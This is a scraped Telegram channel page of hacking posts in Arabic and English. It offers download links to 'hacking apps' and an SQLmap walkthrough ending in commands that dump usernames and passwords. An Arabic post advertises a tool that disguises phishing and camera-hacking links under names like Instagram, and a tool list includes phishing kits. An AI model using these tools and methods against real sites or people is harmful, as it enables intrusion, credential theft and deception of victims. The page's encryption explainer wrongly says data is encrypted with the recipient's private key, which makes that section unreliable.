قناة احمد علي على تيليجرام ( شروحات تقنية ، تطبيقات ، أفلام ومسلسلات ، خلفيات ، و المزيد )
Last updated 3 weeks, 5 days ago
يرمز تيليجرام إلى الحريّة والخصوصيّة ويحوي العديد من المزايا سهلة الاستخدام.
Last updated 4 months, 1 week ago
- بوت الإعلانات: 🔚 @FEFBOT -
- هناك طرق يجب ان تسلكها بمفردك لا اصدقاء، لا عائلة، ولا حتى شريك، فقط انت.
My Tragedy Lies With Those Things That Happen in One Second And Remain
- @NNEEN // 🔚: للأعلانات المدفوعة -
Last updated 2 weeks, 4 days ago
'Hacking App'
Dear Member
Here are some hacking apps for you
📍SandroProxy : https://drive.google.com/open?id=1td1-jb0vQBoLjVP3nbF-ETHZAECHJTr2
📍Droid SQLi : https://drive.google.com/open?id=1FwfRXz9Uh6Phe3YolGTU2RI_mkMmUb7_
📍Anon HackBar : https://bit.ly/AnonHackBar
📍MTK Engineer : https://yeumod.com/mtk-engineering-mode-v1-2-mod-menu/
📍Lightning Web Browser :
https://en.aptoide.com/download?app_id=48162392&store_name=aptoide-web&entry_point=appstore_appview_header_mobile_v10
📍Andro HackBar :
https://en.aptoide.com/download?app_id=47109659&store_name=aptoide-web&entry_point=appstore_appview_header_mobile_v10
📍DH HacKBar :
https://github.com/darknethaxor/DH-HackBar/releases/download/v1.1/Latest.apk
📍Droid Bug Admin Panel Finder :
https://apkcombo.com/droidbug-admin-panel-finder-free/com.bugtraqapps.droidbugpanelfinderfree/download/apk
📍Website Inspector : https://shorturl.at/crtwQ
🛡️ 🔥 SQLmap: The most powerful database vulnerability testing tool! 🔥 🛡️
SQLmap:
It is an open source tool that specializes in detecting and exploiting SQL Injection vulnerabilities automatically and easily.
The tool can allow you to hack into databases and obtain sensitive information.
🎁 Key features of SQLmap:
1️⃣ Automatic vulnerability detection: You can specify a website and let SQLmap scan it for SQL Injection vulnerabilities without the hassle of manual searching.
2️⃣ Types of SQL Injections: SQLmap can detect and exploit multiple types of vulnerabilities, such as:
Blind SQL Injection
Time-based Blind SQL Injection
Error-based SQL Injection
UNION-based SQL Injection
3️⃣ Extracting sensitive data: By exploiting vulnerabilities, you can obtain data such as:
Database tables.
Usernames and passwords.
Server files.
4️⃣ Execute commands on the server:
SQLmap
Not only do you extract data, you can also execute direct commands on the vulnerable server!
🌟 How to use SQLmap:
sqlmap -u "http://example.com/vulnerable-page.php?id=1"
This is the simplest way to start your scan. SQLmap will scan the link and see if the site is affected by SQL Injection.
sqlmap -u "http://example.com/vulnerable-page.php?id=1" --dbs
Using this option, SQLmap will show you a list of databases that are present in the infected site.
sqlmap -u "http://example.com/vulnerable-page.php?id=1" -D database_name --tables
Here you specify the database, and SQLmap will show you the tables in it.
sqlmap -u "http://example.com/vulnerable-page.php?id=1" -D database_name -T table_name --columns
sqlmap -u "http://example.com/vulnerable-page.php?id=1" -D database_name -T table_name -C column_name --dump
This is the method you use to extract specific data such as passwords or usernames from a table.
🎓 Want to learn more about tools like SQLmap?
Join my specialized training camp in programming and cybersecurity from beginner to advanced level!
🔒 The content is constantly updated and at a very affordable price: only $25!
📱 To register or inquire, contact us directly.
Camp details here: Training Camp
SQLI
https://[email protected]/Mf6Be
راح تكونو تخلو اسم الرابط مثلا بسم انستغرام بضبط يكون الرابط مقنع بشكل كبير مثل هاذا
تريدون تحديث جديد تم إضافته مميزات اختراق بث التلفزيون لدول وتم اضافه اخفا الرابط يعني تقدر تخفي رابط الصفحه المزوره او رابط اختراق الكاميرا اي رابط بل لاسم لذي تريده انت يعني يكون الرابط مقنع اكثر بضيف الكثير من المميزات ونزله تفاعلوا 🔫☑️
تشفير المكالمات بين الطرفين في تطبيقات التواصل الاجتماعي يعدّ تقنية هامة تحمي خصوصية المستخدمين. إليك شرحًا مختصرًا لكيفية عمل هذه العملية:
تشفير نهاية إلى نهاية (End-to-End Encryption):
- هذه تقنية تضمن أن المكالمات أو الرسائل تكون مشفرة من جهاز المرسل ويتم فك تشفيرها فقط على جهاز المستقبل. لا يمكن لأي شخص آخر، بما في ذلك الشركة التي تقدم الخدمة، الوصول إلى محتوى المحادثة.
المفاتيح العامة والخاصة:
- كل مستخدم يمتلك زوجًا من المفاتيح: مفتاح عام ومفتاح خاص. يتم استخدام المفتاح العام لتشفير البيانات، بينما يُستخدم المفتاح الخاص لفك تشفيرها. فقط الشخص الذي يمتلك المفتاح الخاص يمكنه فك تشفير الرسالة.
البروتوكولات:
- تستخدم التطبيقات بروتوكولات مختلفة لتأمين الاتصالات. على سبيل المثال، بروتوكول (Signal Protocol) هو أحد أكثر البروتوكولات استخدامًا وتقديمًا للأمان.
مبادئ العمل:
- عند إجراء مكالمة، يتم تشفير الصوت والبيانات باستخدام المفتاح الخاص بالمتلقي. عندما تصل البيانات إلى جهاز المتلقي، يُفك تشفيرها باستخدام مفتاحه الخاص.
- هذا يعني أنه حتى إذا تم اعتراض البيانات أثناء انتقالها عبر الإنترنت، لن يتمكن المُعترض من قراءتها.
التحديثات والدعم المستمر:
- تطور تقنيات التشفير باستمرار، حيث تعمل الشركات على تحديث أنظمتها للتأكد من أن المستخدمين في أمان من التهديدات المحتملة.
باختصار، تشفير المكالمات في التواصل الاجتماعي يعتمد على تقنيات معقدة لضمان الخصوصية والأمان لكل من المرسل والمستقبل.
🛡️ اهم ادوات الأمن السيبراني بحسب الفئة 🔥 .
1️⃣جمع المعلومات:
Nmap
Shodan
Maltego
TheHavester
Recon-NG
Amass
Censys
OSINT Framework
Gobuster
2️⃣ الاستغلال:
Burp Suite
Metasploit Framework
SQL Map
ZAP
ExploitDB
Core Impact
Cobalt Strike
3️⃣ تكسير كلمات المرور:
John The Ripper
Hydra
Hashcat
OPHCrack
Medusa
THC-Hydra
Cain & Abel
4️⃣ مسح ثغرات الامنية:
OpenVAS
Nessus
AppScan
LYNIS
Retina
Nexpose
5️⃣ هندسة البرمجياة:
GoPhish
HiddenEye
SocialFish
EvilURL
Evilginx
6️⃣ التحليل الجنائي:
SluethKit
Autopsy
Volatility
Guymager
Foremost
Binwalk
Wireshark
7️⃣ القرصنة اللاسلكية:
Aircrack-NG
Wifite
Kismet
TCPDump
Airsnort
Netstumbler
Reaver
8️⃣ تقييم حماية تطبيقات الويب:
OWASP ZAP
Burp Suite
Nikto
ZAP
WPScan
Gobuster
App Spider
الان، تم الكشف عن ثغرة جديدة في تطبيق تليجرام (Telegram) للموبايل والكمبيوتر المكتبي (desktop) تتيح للمهاجمين دمج ملفات APK و ملفات exe البرامج التنفيذية و (ملفات تثبيت التطبيقات على أندرويد) داخل مقاطع الفيديو. هذا النوع من الهجمات يمكن أن يعرض المستخدمين لخطر تحميل وتشغيل برمجيات خبيثة بدون علمهم. هنا شرح مفصل لهذه الثغرة:
كيف تعمل الثغرة:
دمج ملف APK داخل الفيديو:
المهاجم يقوم بدمج ملف APK ضار داخل ملف فيديو
إرسال الفيديو عبر تليجرام:
يتم إرسال الفيديو المدمج إلى الضحية عبر تليجرام كملف فيديو عادي.
تنزيل الفيديو وتشغيله:
عند تنزيل الفيديو وتشغيله على جهاز أندرويد، يمكن أن يتم استخراج ملف APK وتشغيله. في بعض الحالات، و يستغل المهاجم نقاط ضعف في نظام التشغيل أو تطبيقات أخرى لتشغيل ملف APK تلقائياً.
تنفيذ البرمجية الخبيثة:
بمجرد تشغيل ملف APK، يمكن للبرمجية الخبيثة تنفيذ أي نوع من النشاط الضار مثل سرقة البيانات، الوصول إلى الكاميرا والميكروفون، تتبع الموقع، أو حتى السيطرة الكاملة على الجهاز.
تأثير الثغرة:
اختراق الخصوصية: يمكن للمهاجمين الوصول إلى البيانات الشخصية مثل الرسائل، الصور، مقاطع الفيديو، ومعلومات الحساب.
التجسس والمراقبة: يمكن للبرمجيات الخبيثة التجسس على المستخدمين من خلال تشغيل الكاميرا والميكروفون.
السيطرة الكاملة على الجهاز: قد تسمح البرمجية الخبيثة للمهاجم بالسيطرة الكاملة على الجهاز، مما يمكنه من تنفيذ أي أمر يريده على الهاتف. انشروها لكل مكان لكي تستفيد الناس و تفهم✅
قناة احمد علي على تيليجرام ( شروحات تقنية ، تطبيقات ، أفلام ومسلسلات ، خلفيات ، و المزيد )
Last updated 3 weeks, 5 days ago
يرمز تيليجرام إلى الحريّة والخصوصيّة ويحوي العديد من المزايا سهلة الاستخدام.
Last updated 4 months, 1 week ago
- بوت الإعلانات: 🔚 @FEFBOT -
- هناك طرق يجب ان تسلكها بمفردك لا اصدقاء، لا عائلة، ولا حتى شريك، فقط انت.
My Tragedy Lies With Those Things That Happen in One Second And Remain
- @NNEEN // 🔚: للأعلانات المدفوعة -
Last updated 2 weeks, 4 days ago